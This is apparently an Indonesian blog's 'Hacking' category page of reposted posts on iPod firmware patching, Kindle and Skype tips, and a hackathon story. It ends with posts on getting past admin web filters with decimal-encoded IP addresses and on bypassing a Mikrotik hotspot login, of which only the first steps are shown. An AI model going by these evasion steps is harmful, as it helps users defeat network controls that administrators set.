Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Hacking Tips: Download Free Games for Your iPod
k4kar0to

On the move, however nerdy it might sound, it’s always practical to have a gaming device at hand. You never know when you’re going to end up in line, stuck in traffic, or locked in an elevator for three days in a row.

However, before I switched Windows Mobile, getting some decent games on my pre-historic cellphone was pretty much impossible, and one doesn’t string a PSP around his neck all day and expect to be popular with the ladies. So, imagine my joy when I discovered that there are free games for iPod that I can download!

These games, which were mainly meant to be downloaded from the iTunes store, could help you kill that little time that was still moving, and although gaming sounds highly impractical with a scroll-click-weel and a center button, they’re great fun.

However, paying for these games gets old quick. Especially because you’re paying 5 bucks (or 5 Euros – people really don’t seem to know how to convert prices) for games you’ve played in your browser a few years ago, like Tetris and music quizzes.

The problem with the iPod’s freeware games market is Apple’s overprotectiveness. It’s not easy to put games on your iPod that weren’t bought in iTunes. But today, we’re going to show you how it’s done.

Note that the iPods supported by this tutorial are the iPod Video 5G and 5.5G (pictured above). Trying this with iPod Nano’s, iPod Classics, or any of the newer models will be bound to result in failure (and there is no other alternative but installing Linux on your device).

Either way, everything described in this tutorial, you do on your own risk. MakeUseOf is not responsible for any potential problems, or damage to your iPod.

Let’s get started, shall we?
Prepping your iPod for free games

The process consists of three parts. First, we’re going to make sure iTunes won’t undo all our hard work with the next synchronisation. Then, we’ll need to copy the necessary files and folders to our iPod, and finally, we’re going to patch our firmware.

Configuring iTunes

First of all, let’s fire up iTunes and disable a few options. In Devices – iPod – Options in the Summary tab, make sure that Enable disk use is checked.

ht1478_1

Also, go to the Games tab and disable the Sync games box.

syncgames

Now, close up iTunes and make sure your iPod is mounted. If not, remove it and plug it in again.

Moving the files

Next, configure Windows Explorer to display hidden files and folders. If you’re using XP, go to Tools – Folder Options. On Vista, this option can be found in Organize – Folder and Search Options.

In the View tab, make sure Show hidden files and folders is enabled.

displayhidden

Open your mounted iPod in Windows Explorer and navigate to iPod_ControlGames_RO and extract the hex folder of your downloaded games. Read more about where to get these games at the bottom of the article.

Patching your iPod

For this one, you’ll need to download iPodWizard (v1.3) and the right firmware file – 5G or 5.5G. If you don’t know for certain which you need, the 5.5G iPod is the one with search function.

Fire up iPodWizard and make sure the edit mode is set to Firmware File. Then, browse to the correct firmware. Finally, press Write to iPod and follow the directions on your screen.

ipodwizard

Congratulations, you should now be able to find your games on your iPod under extras. Have fun!
Download Free iPod Games

If you do a quick Google search, a few sites will pop up where you can find free games for your iPod that you can download, one of those sites is Emobilez. This site offers a wide variety of free mobile/portable software, and has a healthy arsenal of games as well.

Although I’ve got my doubts with some of them (e.g. Lost and Zuma), all games are believed to be in the public domain.

How do you find gaming on your iPod? What are your favorite iPod games? Let it all out in the comments!

Read More..
Category:   Leave a Comment
Hack Your Kindle: 100+ Tips, Resources, and Tutorials to Read Better and Learn Faster
k4kar0to

Although many users of the Kindle will use it as a book reader and nothing else, the device is so jam-packed with possibilities that you’d be a fool not to take advantage of them. The Kindle can be used for GPS, wireless connectivity, playing music, and so much more. Read on to find out how you can be a better student or person with these Amazon Kindle hacks, tips, and resources.

Tips

Follow these tips to make Kindle a better, more convenient reader, or to push the limits of what the device will do.

1. Subscribe to magazines and newspapers for early delivery: If you sign up to receive subscriptions to print products on your Kindle, you’ll often get access to them before they hit the newsstands.
2. Print screen: Make a screenshot by pressing Alt-Shift-G.
3. Activate Kindle’s picture viewer: Create a "pictures" folder and "book," and you’ll be able to view images on your device.
4. Turn off your wireless when the signal isn’t great: If you’re in an area where you’re not getting a good wireless signal, be sure to turn the function off or you’ll drain your battery quickly.
5. Kindle supports multiple formats: You can read .mobi, .prc, .txt, .jpg, .gif, HTML and Word files on the Kindle.
6. Preserve your book collection: Keep a digital copy of your literature in case of fire, flood, or theft.
7. Skip more than one page: You can fast forward though pages by pressing and holding Alt plus the Next or Previous page keys.
8. When in doubt, reset: If you get an "Unexpected error" or other troubles, try giving your Kindle a quick reset to see if it will solve the trouble.
9. Find the web browser: You can find the Kindle’s web browser under the "Experimental" banner.
10. Check out Wikipedia: If you’ve read about something and would like more information on it, simply hit Kindle’s Wikipedia search for an answer.
11. Send IMs: You can use Yahoo! Messenger on the Kindle.
12. Use it for reference material: Load reference books that you Use Kindle NowNow: With this human-powered search system, you can get information on the go.
13. Turn off your wireless anytime: Although a bad connection will drain your battery, just turning wireless off any time you’re not using it will help your battery charge last much longer.
14. Use the calendar: You can download a calendar for the Kindle at a minimal price.
15. Access your readings on Amazon: Amazon keeps a copy of your subscriptions and books online, so if you accidentally wipe everything out in an upgrade, you can get it back again with relative ease.
16. Select between sizes: The Kindle offers six different font sizes.

16.
17. Avoid hitting the "Next Page" button: Try pressing a key on the keyboard to keep your crip, or slide a rubber band into the slit behind the page turning bar.
18. Take advantage of the search function: Easily find the information you’re looking for by searching electronically on the Kindle.
19. Read RSS feeds using Bloglines: Instead of paying to download subscriptions, set up your RSS feeds on Javascript-free Bloglines for free.
20. GPS: You can use the Kindle’s CDMA mobile coverage to find your location on Google Maps.
21. Use it as an MP3 player: Did you know that the Kindle doubles as an MP3 player? Put this functionality to use with its headphone jack and speakers.
22. Make reading accessible: Try resizing text to make reading easier for the elderly or other visually impaired persons.
23. Minesweeper: By pressing Alt-M, you can access Kindle’s Minesweeper game.
24. Get free conversions: If you send attachments to "name"@free.kindle.com, you can have files converted and emailed to you, and then transfer the document to your Kindle.
25. Use the dictionary: The Kindle comes pre-loaded with the New Oxford American dictionary.

Tutorials & Guides

Follow these documents for step-by-step instructions on Kindle hacking.

26. Getting the Console: This tutorial shows you how to access your Kindle’s console.
27. How to fill your Kindle for FREE: Check out this guide to learn where you can find free content for the Kindle.
28. Ideas for Hacking Kindle WiFi: In this guide, you’ll get a number of ideas and resources for hacking into WiFi on the Kindle.
29. The Kindle Browser-Wireless Information Tool?: SamSpeak considers the use of the Kindle browser.
30. Jump pages in the Kindle: Skip ahead to a new location in your Kindle using the instructions in this tutorial video.
31. Gmail on the Kindle: This resource offers instruction and a few tips for reading Gmail on the Kindle.
32. A Beginner’s Guide to Kindle Content: Read this resource to learn how to find content for your Kindle beyond the Amazon store.
33. Adding your own pictures to the Kindle Screensaver: Check out this tutorial to learn how to put your own photos in the screensaver rotation.
34. How hard is it to return an ebook?: Visit this guide to learn how to handle returns with Amazon.
35. Amazon Kindle-A Value Investing Tool: Fat Pitch Financial considers how you can use the Kindle for investment.
36. Feedbooks Kindle Hack: This tutorial shows you how to use the Feedbooks Kindle Download Guide as an on-demand library.
37. Listening to Audio Books: Find out how to get audio books from Audible in this guide.
38. Bootloader and firmware updates: Here you’ll learn how to get into the interactive shell and perform firmware updates.
39. Amazon Kindle Disassembly and Take-Apart Guide: Check out this tutorial to see how you can get into the guts of the Kindle.
40. Creating Folders on the Kindle’s SD Card: Check out this guide for tips on Kindle folder management.
41. Wanna Read Manga on Your Kindle?: Use the Kindle’s photo function to flip through manga and other image-based books.
42. Play music on a Kindle: Check out this video to see how you can play MP3s on your Kindle.
43. Getting Free Books: Here you’ll learn a few resources for finding books and a number of different ways to get them on your Kindle device.
44. How to transfer and convert lots of documents to the Kindle: This library expert discovered that emailing her Kindle address would result in perfectly converted and available files.
45. The Amazon Kindle: As a RPG Resource: This reviewer explains how you can use the Kindle for role playing games.
46. Root shell and runtime system: Get into the root shell and runtime system with this tutorial.
47. How to view PDF files on the Kindle: Check out this tutorial to learn how to read PDF files using your Kindle.

Shortcuts

Use your Kindle with ultra quickness by learning these handy shortcuts.

48. Keyboard shortcuts: This resource offers, among other gems, a number of keyboard shortcuts for the Kindle.
49. Jump to the Beginning or End of Home Menu or for a Book: This resource explains a few navigational shortcuts.
50. GPS shortcuts: This resource has a bunch of different shortcuts to use with Kindle’s GPS.
51. Search commands: Find some secret and not-so-secret search commands in this resource.
52. Home screen time: If you press Alt-T, you can show time on the home screen.
53. Kindle Keyboard Reference: Check out this reference sheet for keyboard shortcuts and commands.

Tools

Make use of these tools in order to hack and otherwise use your Kindle for extraordinary purposes.

54. MobiPocket: Format PDFs into .mobi files that you can read on your device using MobiPocket.
55. Kindle Coverage Tool: Check out areas of coverage with this tool that graphically indicates wireless availability.
56. eBookSearchr: Use this ebook search engine to find material to put on your kindle.
57. Mighty Bright XtraFlex2 Light: This little light clips on to the back of your Kindle whenever you need a little extra light for reading.
58. Gutenmark: This utility easily formats Gutenberg books to a format that looks nice on the Kindle.
59. Tubby: Using Tubby, you can convert CHM to HTML.
60. AudibleManager: With the AudibleManager, you can transfer Audible audiobooks to your Kindle.
61. PDFCreator: This program installs a printer on your system, and you can use it to create Kindle-readable PDFs from any program with a print function.
62. Mobi scripts: Use these scripts to be able to use mobi files on your Kindle.
63. Book Designer: With this conversion tool, you can output files in a number of compatible formats.
64. Project Gutenberg Conversion Template: Using this macro template, you can convert Project Gutenberg txt files into a more friendly format.
65. Python interpreter: You’ll need to download a Python interpreter to read Mobipocket books.
66. DailyLit: DailyLit will email you portions of books to read on your Kindle.
67. Beam-ebooks Converter: With this web tool, you can copy and paste text into the form field and get a .prc or PDF file.
68. ABC Amber LIT Converter: This free tool can convert the .lit format to a Kindle-readable .prc file.
69. Use your Kindle as a EVDO WiFi Access Point?: This thread discusses one way to use your Kindle for WiFi.
70. Google Book Search: With this Google function, you can read the classics online.
71. ABC Ambe CHM Converter: Convert .chm format files to .prc using this tool.

Book Sources

Students and bookworms can use these sources to find free or cheap ebooks and audiobooks for use on the Kindle.

72. Fictionwise: Fictionwise offers thousands of different ebooks, from romance to science fiction.
73. Online Books Page: UPenn hosts more than 30,000 different books that you can read online.
74. Audible: Check out this site to download audio books. You can use them to listen as you read along in print.
75. Flazx: On this site, you’ll find computer and IT books to read on your Kindle.
76. Diesel eBooks: Diesel has more than 750 free ebooks from authors like Jane Austen and Lewis Carroll.
77. Mobipocket free books: This resource offers a number of different Kindle-compatible ebooks for free.
78. Free Kindle eBook: This blog offers the occasional link to downloads of wonderful Kindle books.
79. ManyBooks: Here you’ll find a large collection of ebooks.
80. FreeTechBooks: This site offers free computer science and programming books.
81. Well Told Tales: Listen to short, free audio books on Well Told Tales.
82. Project Gutenberg: Download books in the public domain from Project Gutenberg.
83. MobileRead E-Book Uploads: This community shares a number of ebooks that you can download.
84. PinkMonkey: Pink Monkey offers free access to study materials and book notes.
85. LibriVox: Visit this publisher to find more than 1,000 full length audio books recorded by volunteers.
86. FreeComputerBooks: Get access to loads of technical information on your Kindle using this resource.
87. Baen Free Library: This publisher puts out a selected collection of no-strings-attached titles for download.
88. Wowio: Wowio is home to a large collection of free ebooks, comics, and graphic novels.
89. WebScriptions: This site’s ebooks are compatible with the Kindle.

Publishing

Don’t just read other works, get your books and other publications available on the Kindle.

90. Digital Text Platform: With this platform, you can publish your books to be read on the Kindle.
91. Scribd: On Scribd, you can upload documents, publish, and more.
92. Use hyperlinks: Share links to interesting resources and further reading in Kindle-published works.

Resources

For even more information on Kindle hacking, be sure to check out these resources.

93. Kindle Hacking: Charlie Tritschler, director of Kindle, discusses the possibility of hacking the Kindle.
94. Tips and Tricks of Kindle: Amazon offers a few different tricks for their device.
95. Amazon Customer Discussions: Learn about tricks and tips from other Kindle owners here.
96. eNews Content Available on Kindle: This list offers a collection of full feeds you can read on the Kindle.
97. Amazon Kindle Hints and Tips: Mobility Today discusses a number of tips and hints for the Kindle.
98. The Kindle Site List: KindleChat maintains a list of Kindle resource sites.
99. Contact Amazon in an emergency: Here you’ll find useful contact information for Kindle owners.
100. Share Kindle Tips: Check out this Amazon forum thread to find a list of useful tips for the Kindle.
101. Yahoo! KindleKorner: Visit this community for ongoing tips and tricks from other Kindle owners.
102. Tips, Tricks, and Hints: Visit this thread to learn about all of the different tricks Kindle users have come up with.
103. A Million or so Kindle books available now: where to get them and how: Check out this resource for loads of information on where you can find titles for download.
104. 30 Benefits of Ebooks: This resource takes a look at a number of different ways you can use ebooks.

Read More..
Category:   Leave a Comment
5 Tips to Winning a Hack-a-thon Competition
k4kar0to

On July 31st, a group of Singularity University students and I decided to attend iPhoneDevCamp at Yahoo HQ – for an impromptu field trip. Our goal: to gain first-hand experience of the rapid pace of innovation in Silicon Valley. And maybe build a cool app to enter into the hack-a-thon competition. The result was an app called “Gettaround” (www.gettaround.com).

iPhoneDevCamp

20,000 lines of code, 2 days, and just 4 hrs of sleep later, our app won the “Best Money Making App” category (sponsored by Mobclix) in the hack-a-thon. Here is a short clip of our presentation for the judges:



Here are some members of our very talented development team:

ddd

Charles Du (Me) Elliot KrooAnand GuptaJohn Varghese

Product Manager Developer Developer Developer

Our team also included Jonah Williams (not pictured)

The talent and experience of our development team was a strong factor in our success. But I’d like to share what I believe to be five additional key factors to our success that are independent of the development team. Factors that are more dependent on preparation, passion, and environmental awareness – that any team can repeat with little or no cost at the next hack-a-thon.


1. Prepare to recruit the rockstar developers in the room

Talent makes or breaks any project. Even with the best idea, the lack of talent to implement would kill it. Out of the 500 developers, product managers, and marketers that attended iPhoneDevCamp that weekend, we had to find four rockstar developers who are passionate enough about the “get-around project” and could put it together in one weekend. And to say that recruiting, filtering, and motivating talent is hard would be an incredible understatement. Ask any CEO in Silicon Valley…

How we did it? Two days before iPhoneDevCamp, we created a developer recruitment plan, and assembled a “GO Team” to execute. Two great members of the group – Jessica Scorpio and Bentley Turner – stepped up as recruiters. I coached them through what to look for in a rockstar iPhone developer, and we practiced possible dialogue scenarios including which ‘tough’ questions to ask. In typical last-minute fashion before iPhoneDevCamp, we designed and custom-printed three green American Apparel T’s. (Mine read: “Rockstar Product Manager,” and Jessica and Bentley’s read “Wanted: Rockstar Developers”).

Recruiting Team

The result was a marketing and recruiting team, dressed in “get-around green,” who are fluent in Map Kit, augmented reality, JSON, and Cocoa Touch lingo. At iPhoneDevCamp, we also posted flyers with our contact information in highly trafficked places to broadcast our message – develop with your fellow rockstars. Within minutes, we received dozens of text messages indicating interest for our project.

Through the evening, our team spoke with more than 200 people. In the end, we found four rockstar developers that were definitely some of the best in the world, and also a joy to work with.
2. Be the Vision. Bring the UI.

The idea for the app was hashed a couple of days before iPhoneDevCamp. Once the decision was made to attend iPhoneDevCamp, we worked with Sofya Yampolsky, a very talented SU student on the graphic design. (She also did a fantastic job of polishing up the UI during the hack-a-thon).

UI concept before dev camp

This saved us a LOT of up-front time. Armed with the UIs and a solid vision for the app, with the entire team in pitch mode, it was quicker sell for recruitment.
3. Talk about code ownership before any major design is done

Nearly all of the weekend was going to be spent creating valuable code, so it was extremely important to agree on the ground rules on how to use that code. We ended up deciding that all of us (developers and product manager) would be able to access and reuse the code, but not open it up for other parties. By agreeing on these ground rules, we were able to focus on developing the product without the risk of arguing over who owns what and how at the end of the competition.
4. Have a backup location with Internet access ready

The facilities at iPhoneDevCamp closed at 11pm every night. Of course there was no way we could let this limit our productivity. We entered iPhoneDevCamp with two backup facilities for late night development. After iPhoneDevCamp closed on Saturday night, we moved the dev team to the SU students’ residence and worked until all four developers’ code was successfully merged, and the UI was completely finished (all buttons and graphics PNGed). Final end time on Saturday – 4AM Sunday!
5. Present in video instead of a live demo (if possible)

We started off on Sunday (final day) with a lot of uncertainty. We succeeded in merging the code of four people, but had not finished the views yet – no transition was done. Our team seemed to be looking into the jaws of defeat. (I’m pretty sure we weren’t the only ones, because every team that we talked to was trying to buy more time or present last).

Every team faced the intense pressure of needing to prepare and present on a product that wasn’t fully baked. And, we all had just 3 minutes to present. The lifesaver for us was our presentation style. Most teams decided to do a live demo, but we decided to demonstrate our product in an edited video. Through the video, we could fully share our vision for the app and tell a story that the judges could connect to (especially with the iPhone commercial music in the background). More importantly, the video gave us the control we needed to keep it under 3 minutes.

Because our team was finishing views and transitions in real time, editing our presentation video was one of the coolest experiences I’ve had. As soon as someone from our team finished a view, I recorded a clip and edited it. I shot and edited in real time. But, by 2pm (deadline to enter), we were only 70% done connecting our views to our controller. All we could do was hope that we were picked later so we could finish. As teams went up and presented, we blocked them out and kept working. I was impressed by the focus of the team, given the seemingly insurmountable time pressure. When we were finally called on to present, I was literally exporting the video file with running battery red on my Macbook Pro! It doesn’t get much closer than that for a finish!

I’ll close this post by saying that winning the hack-a-thon with such great people was one of the coolest experiences of my life. Shoutouts and congratulations to our 4 rock star developers: Elliot Kroo, Anand Gupta, Jonah Williams, John Varghese, and to the supporting cast: VJ Anma, Jessica Scorpio, Sam Zaid, Bentley Turner, Sofya Yampolsky, Miguel Elasmar, Gregor Hanuschak, and Sarah Sclarsic.

Looking back, I’m still amazed at what you can accomplish in one weekend. With a vision, a plan, and a great team, anything is possible.

Read More..
Category:   2 Comments
Hacking Skype: 25 Tips to Improve Your Skype Experience
k4kar0to

Hacking Skype: 25 Tips to Improve your Skype Experience

How versatile is your Skype? Ours can podcast, translate French, take conference calls from 15 people, and tutor calculus. Want to learn how to turn your Skype telephone into a multipurpose office machine? We're going to tell you how.

For millions of users, Skype is the VoIP solution of choice. If you're just getting into this great telephone alternative, you are going to be surprised how much you can do with it. In this article we cover 25 tips, hacks, and extras to help you utilize Skype to its fullest potential.


Starting Simple: Built-In Skype Features you Didn't Know About

Skype is such a rapidly emerging technology that a lot of brand new users aren't even aware of all the built-in features that Skype offers standard, not to mention the add-ons and hacks that you can improve it with. In this section we cover some often overlooked standard features of Skype that can dramatically improve your experience.
1 Call Forwarding

Whether you've set your Skype account up on your home or work computer, the fact is, you are occasionally going to get important calls when you aren't there. Thankfully, you can simply forward those calls to another Skype account or even a cell phone or land line. That way, even if your computer at work is shut down, as soon as a call comes in to your Skype account, the call will immediately ring on your cell phone, your home computer and your home phone line, meaning that no matter where you are you'll be sure to get it.
To forward a call click on the "Tools" menu and select "Options." From there set the forwarding number in the "Call Forwarding & Voicemail" section.

2 Filtering and Blocking Users

Skype is a great tool for both business and pleasure, but if you don't take preventative steps, it can also cause you some serious security problems. Vishing is a new VoIP targeted scam in which cyber-criminals use a VoIP client such as Skype to call people and attempt to trick them into revealing important financial details such as credit card numbers or online passwords. But you can limit these attacks by simply blocking unwanted callers.
To block unknown or unwanted callers, simply click on "Tools" and select "Options." From there, select "Privacy" and choose the level of security that works best for you. When it comes to individual attacks, you can avoid repeat vishing calls by blocking the spammer by clicking on "Manage Blocked Users" in the "Options" dialog.




3 A DIY Home Security System

Whether you want to keep an eye on your pet goldfish from work or just make sure no one has broken in the house while you are on vacation, Skype can double as an away from home monitoring system.
Checking in is simple with Skype's one and two way video calling. You'll need two separate Skype accounts, a computer at home with a webcam, and access to the Internet. Using one account, setup the home version of Skype to auto-answer calls and automatically fire up the webcam. Then to check in, just use the second Skype account to call the first, and the webcam video will pop up.

4 Providing Customer Support

Got a small business online? Want to offer some customer support without spending a fortune on telephony costs? Skype's graphical click-to-call SkypeMe buttons are ideal for this. Create your SkypeMe button (free account needed) and embed the code in your website, weblog, template, email, or wherever you want it to appear. When someone views your web page (or email message), the button will indicate whether you are online and accepting Skye calls, busy, or offline. If you're on the go and want to receive calls, just leave your Skype client running and set call forwarding (see above).

Plugins, Addons, and Extras

Think of the off-the-shelf version of Skype as a new car without any optional package. Sure, it will still get you to and from work, but it doesn't have any of the bells and whistles that make your new toy exciting. Unlike car options, however, these Skype Plugins and Add-ons won't cost you a fortune, and they're easy to install to boot.
5 Using Skype to Sell your Services

You've got information that other people can use, and with the Bitwine Skype add-on you'll be able to leverage that information into an income stream. Whether you're a lawyer, a mechanic, or a talented collector, there are people willing to pay for the information you have, and using Bitwine makes selling that information easy. Through Bitwine, you set up your hourly rate, then customers approach you about the topic they would like to discuss, you set up a meeting time, and at the end of the meeting Bitwine tallies up the time and will even coordinate payment via PayPal through another add-on, Bitwine extra.

6 Recording Calls

There are a lot of add-on options for recording Skype calls, including the free Audacity audio editor. But Audacity has to be triggered manually, and since you don't always know beforehand when a call should be recorded, the fact that Audacity is manual is a serious limitation. By contrast, there are a number of Skype recorders that start up automatically. HotRecorder is arguably among the best. HotRecorder allows searchable Meta text to be added to each recording, and works with Google Talk and other IM clients. For aspiring Howard Sterns, there's a selection of Emotisounds such as laughs, claps, etc., that can be inserted into the conversation for later podcasting.

7 Enhanced Voicemail

If you use your Skype phone for more than just the occasional long-distance call, you should enhance your voicemail setup beyond the basic Skype standard. Pamela offers (automatic) call recording, an answering machine for voice and video, automated chat reply if you're away, Skype VoiceMail management, and email forwarding of audio files. In addition, Pamela will let you setup a separate greeting or voicemail message for different users, so that your business and personal calls won't hear the same message. And best of all, Pamela allows for remote control, meaning that if you forget to change one of the voicemail settings before you go on vacation, you can make the changes via any computer anywhere.

8 Keep Up With New Music

If you constantly find yourself wondering why everyone else's iPod seems to have better music than yours, maybe its time to start branching out and discovering new music. Last.fm, a Skype add-on provides you with an easy forum to share your own musical preferences and listen to what other people like. With this add-on, you can browse through other Skype and Last.fm user's music collections and listen in. While you're listening, information about the song and artist you're listening to is displayed and you're given the ability to find similar titles.

Setup is really simple, you just need to download the Last.fm extra, sign up for a free account at Last.fm and there download the Last.fm software. For those of you that are Mac users, Last.fm will still work as a Skype add-on, the only difference is that you will need to download the iScrobbler extra to make Last.fm Mac compatible.

9 Universal Chat and Language Translation

It's a global world out there, so whether you're conducting business or pleasure with Skype, you are likely communicating with people around the world and may occasionally encounter language barriers. Thankfully, by using the quick add-on Universal Chat Translator you can communicate with anyone no matter what language they speak. The software only produces text translations, so you may feel like you're watching a foreign film with subtitles, but the fact that the Universal Translator can read text in 11 languages and understand spoken text in 50 means that you'll at least be able to get your point across.

10 A Complete Small Business Collaboration Solution

If you're running a small business or working as part of a team on a single project, real-time collaboration is essential. There's no better way to supplement your Skype conferencing than with a collaborative desktop provided by Skype add-on Unyte. Unyte lets you choose which applications or documents to share with the other people on your conference call. Then everyone can be looking at the same documents at the same time, and when changes are made they appear on everyone's screen so that there is no confusion. Pricing depends on the number of people you want to bring in on the conference, but you can give two-person collaboration a try for free.

11 Combining Real-Time Document and Voice Collaboration

If the setup hassles of Unyte are too much for you, a simpler solution that redefines easy-setup is TalkandWrite. TalkandWrite will give you video and voice conferencing as well as handle real-time collaborative document editing. That means, that not only will the changes you make be reflected on the other person's screen, but you'll also be able to see and talk with the other person about those changes as you make them. This easy Skype add-on can be a real time-saver for anyone who spends time working with a small team preparing for a project.

Mobility

With the advent first of cordless phones and then cell phones, every communication device is going mobile. So it doesn't make sense that your most advanced communication tool, Skype, should keep you tethered to your computer. Here are a few Skype add-ons and extras to give you the freedom to get out from behind your desk.
12 Bluetooth and Skype

The first step to mobility is just cutting the cord that connects you to your computer when you're using Skype. You can think of this step as the advent of the cordless phone for Skype, it will get you mobile, but only within certain limits. Most newer computers are already Bluetooth capable, so purchasing and synching up a Bluetooth wireless earpiece or headset is extremely simple. In fact, you can use a single Bluetooth earpiece to handle calls from both Skype and your cell phone, so you may not need to buy anything if you're already using a Bluetooth earpiece with your mobile. The only downside to going Skype wireless via Bluetooth is that you are limited by Bluetooth as to how far from your computer you can be. But for those that are just looking for a way to cut the wire and have a little more mobility around the office, Bluetooth is the perfect solution.

13 Mobile Phone Skype Calling

Imagine if you could use SkypeIn or SkypeOut from your cell phone: you could make and receive phone calls to people around the world with the convenience of your cell phone but the pricing of Skype. Thankfully, that day is already here, but a surprising number of Skype fans just don't yet know about the capability. Ego has been offering their Skype based cell phone service for almost a year. It lets you see who is online, make and receive calls with your Skype contacts, and use Skype Instant Messaging.

If the idea of carrying both a Skype phone and a regular cell phone doesn't suit you, TalkPlus has hacked the Skype API to create a server that functions as a Skype client, demonstrating that integrating Skype calls and regular mobile calls will soon be a reality. In fact, in November 2006, TalkPlus demonstrated a successful mobile call to Skype test id echo123. Their hack was then made public, and could be installed on mobile phones to talk to the Skype server. Since then, the service has temporarily gone MIA, but expect that very soon full cell phone/ Skype integration will be a reality.

14 Skype on a Cell Phone…Indirectly

While the ultimate goal is complete Skype/ mobile integration, for now you can get a lot of the functionality of a Skype mobile phone by routing your mobile through your home Skype setup. By using a Phone Diverter, which will allow your cell phone to communicate with your computer, you can enable Skype on your mobile phone indirectly.

Essentially, you will be using your mobile phone to call your home computer, which will in turn ask you to enter a password, and then allow you to use your SkypeOut credits to call your Skype friends. While the system isn't yet perfect, in part because you'll be racking up both your cell phone and SkypeOut minutes at once, it is an effective way to be able to make Skype calls from your cell phone now.

15 Bringing Skype to your TV

Imagine, you hear your Skype phone ring, but it's the fourth quarter of the game, and who knows if the call is even important. You don't want to get up, but it seems you have no choice. Thankfully, with mcePhone you won't have to get up to find out who is calling ever again, as your incoming Skype calls will simply pop up on your TV screen.

From your TV you'll be able to see your own Skype-Status (online, offline, etc), the number of SkypeOut credits you have, which of your Skype friends are currently online, and whether you have any new voicemails. And when a new call comes in, a small window automatically pops up letting you know who the caller is, and it will even let you decide whether you want to accept, ignore, or reject the call all by remote control.

16 Having your Skype Announce Who is Calling

Despite its simplicity, AudioID is easily one of the most useful Skype hacks for home users. AudioID will allow you to setup an individualized announcement for each caller that will play over your computer or home speaker system. So instead of hearing a generic computer ring from somewhere way back in the home office, you can hear a clear message from your computer, "Call from Kristy" which will let you decide whether you need to run back to take the call or whether it can wait until later.

Pure Silliness: Skype Hacks Designed to Entertain

Much of Skype's appeal is the connectivity and productivity it brings to its users. But Skype can also just be a great way to have a whole lot of fun. These simple hacks will help you do just that.
17 Voice Analysis Love Detector

Whether you're using a Skype based dating service or are just want to know if that secret crush feels the same way about you, the Love Detector is a fun Skype add-on that uses SENSE voice analysis technology to detect love and other emotions over your Skype calls. But before you rush out and purchase the full version, you can give this add-on a free trial run and start testing how people really feel about you.

18 Making Board Games Fun Again

Need a break from work but need to stay in front of the computer so your boss doesn't get suspicious? There are a whole host of classic board games that you can add-on to Skype for some fun diversion. With Backgammon, Bingo, Chess and Checkers, you can compete against your fellow Skype users using 'old-school' games with 'new-school' interfaces.

19 KishKish Lie Detector

If you're using your Skype phone to conduct business deals and you want to make sure the other party is being truthful, or you just want to prove once and for all that your boyfriend is a cheater, try KishKish the Skype Lie Detector add-on. KishKish detects the stress level of the person you are talking with over Skype, and it uses that information to detect when they are lying.

20 Creating a Lip-Snyc-ing Avatar to Hide Behind

Video calls can be great for connecting with people on a more personal level. But sometimes, whether because we don't know the caller well or it just hasn't been a good morning, we don't want to be seen. Instead of feeling embarrassed in front of the camera, CrazyTalk allows you to create your own Skype video avatar and have him/ her lip-sync anything you say. This fun add-on is surprisingly simple to setup and use, and will allow you create your own custom avatar from any digital photo. Once set up, it takes just a click to have the avatar pop up, cover the Skype video screen and begin lip-sync-ing.

21 Disguising your Voice

There's nothing more entertaining than changing your voice to mess with your friends. Whether you want to impersonate their boss or their girlfriend, DoNaut has got you covered.

This easy to install Skype add-on will allow you to adjust the tone and quality of your voice throughout the call. In addition, you can use DoNaut to pipe in some background music to your Skype calls off your favorite music player such as iTunes, or Windows Media Player.

22 "Can I Have Your Number?" … "Umm, No."


Whether from a bad blind date, or a sales person that just won't take no for an answer, we've all been in a situation where we didn't want to give the person our phone number or Skype information, but it seemed unavoidable.

Thankfully, the folks that compiled the original NotMyNumber Directory have given Skype users the ability to provide people with a fake number as well. This simple Skype add-on will give you access to local numbers in every major city that are guaranteed to be inactive. That way, when someone you don't want to talk to asks you for your Skype number, you can very casually access the Skype NotMyNumber Tool and offer them a completely fake number.

Advanced Hacks

If you're tech savvy and really want to push your Skype setup to the limit, this list of advanced hacks can help you create functionalities that are sure to improve your experience and wow your friends. But be forewarned, even though a lot of these hacks will be simple to advanced tweakers, if you're new to Skype you may find some of these hacks are over your head.
23 Multiple Logins


If Skype has become your family's communication device of choice, then no doubt you have experienced the problem of having multiple members of your family trying to use your home Skype account at the same time. For a quick fix to this problem, just setup setup multiple logins, so that everyone in the family can use their Skype ID whenever they want. So far this hack is only available for Windows XP users, but keep an eye out for a hack compatible with your OS in the near future.

24 Wake-up Call

If you're a regular business traveler, finding yourself without a wake-up call can be a big problem. Thankfully, by following this hack tutorial you can use the "Scheduled Task" feature in Windows XP to set a time and have Skype call the hotel phone to wake you up.

25 Design your own Hack

Don't see a hack here that interests you? Or maybe you need custom functionality and can't wait for someone to create it. Skype has open developer API, so you can write your own plugins which can be created in HTML or Java, or as an EXE or DLL. If you're looking for a community to help you with some of the programming hurdles, the Skype Developer Zone blog will even keep your questions private so that no one steals your new idea before you get it finished. And when your application is complete, the site also offers a Publishing Studio Publication Studio to manage your published component.

Read More..
Category:   3 Comments
Menembus Situs Yang Diblokir Admin
k4kar0to

Mengesalkan memang kalau akses kita dibatasi oleh admin kantor atau warnet.Ada jaringan internet kok ga bisa buka situs yang kita mau, seperti sayur tanpa garam jd rasanya kurang enak hehhe....

Ada sedikit trik dalam menembus situs yang terblokir dan tentunya sangat mudah diterapkan teman2 semuanya, step by step :

1. Buka cmd
Start >> All Programs >> Accesories >> Command Prompt

2. ketik ping site yang terblock untuk kita lihat ip addressnya...
disini saya mencontohkan http://www.youtube.com
karena ada beberapa isp yang memblog situs ini...

Code: Select all
ping www.youtube.com

maka kita dapat melihat ip addressnya yaitu :
kita mendapatkan ip addressnya yaitu :

Code: Select all
208.177.236.70
3. masukkan alamat ini ke

Code: Select all
http://www.allredroster.com/iptodec.htm
untuk kita jadikan desimal :

kita lihat hasilnya ...

Code: Select all
Desimal dari alamat ip 208.177.236.70 adalah HTTP://3497389126

4. Setelah ketemu pindahkan HTTP://3497389126 ke browser kesayangan anda!
dan hasilnya

Langsung nikmati akses internet tanpa batas hahahaha.....

Read More..
Category:   8 Comments
Baypass Hotspot Mikrotik
k4kar0to

Baypass mikrotik login berfungsi untuk membuka akses internet yang diblok oleh sang admin menggunakan MIKROTIK.Pembahasan ini telah saya ujicoba menggunakan mikrotik versi 2.9.27.
1.coba cek akses internet menggunakan ping –t yahoo.com
2.kemudian buka web browsher, biasanya sang admin akan memberikan form login kepada user agar memasukan username dan passwordnya.contoh gb.dbawah



